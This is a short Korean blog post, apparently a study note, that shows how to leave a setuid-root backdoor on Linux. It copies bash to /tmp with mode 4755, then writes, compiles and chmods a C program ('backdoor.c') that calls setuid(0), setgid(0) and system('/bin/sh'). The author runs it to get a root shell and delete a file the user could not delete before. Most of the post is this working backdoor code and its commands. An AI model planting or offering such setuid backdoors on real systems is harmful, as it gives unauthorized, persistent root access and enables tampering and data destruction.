SetUID는 보안에 치명적일수 있다고 전에 배웠다.
참고 : http://cheesev.tistory.com/entry/aboutSetUID
위 그림처럼 원본의 bash쉘을 /tmp 에 복사하고 4755 권한을 주었다.
원래 SetUID개념이라면 root권한으로 실행이 되어서 rm -rf 명령으로 지워져야하지만 이에 대한 보안노력이 있어 잘 먹히지 않는다. 약간의 트릭으로 이를 피해보자
backdoor.c라는 소스를 코딩하여 컴파일
#include<stdio.h>
main(){
setuid(0);
setgid(0);
system("/bin/sh");
}
#gcc -o backdoor backdoor.c
#chmod 4755 backdoor
을 수행한후
#./backdoor
를 쳐보면
쉘 권한이 바뀐것을 볼 수있다.
아까 지우지 못했던 파일하나를 지워보자. 지워진다.
'예전것 > Linux Basic' 카테고리의 다른 글
vmware tool 설치 팁. (0) | 2010.06.03 |
---|---|
vi setting (0) | 2010.04.02 |
find 옵션에 +,- 붙은것들 (0) | 2009.09.07 |
SETSUID에 대하여 (0) | 2009.09.07 |
rlogin, rsh 설치 (0) | 2009.08.07 |